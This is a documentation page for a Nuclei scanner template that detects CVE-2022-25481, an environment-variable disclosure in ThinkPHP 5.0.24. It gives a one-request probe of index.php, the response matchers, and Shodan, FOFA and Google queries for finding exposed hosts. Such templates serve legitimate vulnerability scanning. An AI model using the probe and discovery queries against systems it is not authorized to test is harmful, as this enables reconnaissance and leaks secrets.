ThinkPHP 5.0.24 - Information Disclosure
ID: CVE-2022-25481
Severity: high
Author: caon
Tags: cve,cve2022,thinkphp,exposure,oss
Description
Section titled “Description”ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2022-25481
info: name: ThinkPHP 5.0.24 - Information Disclosure author: caon severity: high description: | ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. impact: | An attacker can exploit this vulnerability to gain sensitive information. remediation: | Upgrade to a patched version of ThinkPHP or apply the necessary security patches. reference: - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25481 - https://github.com/20142995/sectool - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25481 cwe-id: CWE-668 epss-score: 0.01261 epss-percentile: 0.85591 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thinkphp product: thinkphp shodan-query: - title:"ThinkPHP" - http.title:"thinkphp" - cpe:"cpe:2.3:a:thinkphp:thinkphp" fofa-query: - title="thinkphp" - header="think_lang" google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,exposure,oss
http: - method: GET path: - '{{BaseURL}}/index.php?s=example'
matchers-condition: and matchers: - type: word part: body words: - "Exception" - "REQUEST_TIME" - "ThinkPHP Constants" condition: and
- type: status status: - 200 - 500 - 404 condition: or# digest: 4a0a004730450220008bc43c3900878cfce125ee94f37713100f5f7b07861fcceac2aa07a83caa59022100f9bfd05650a85d230e3415d5d15da0245c3953319940579cd875d0f014e191f4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25481.yaml"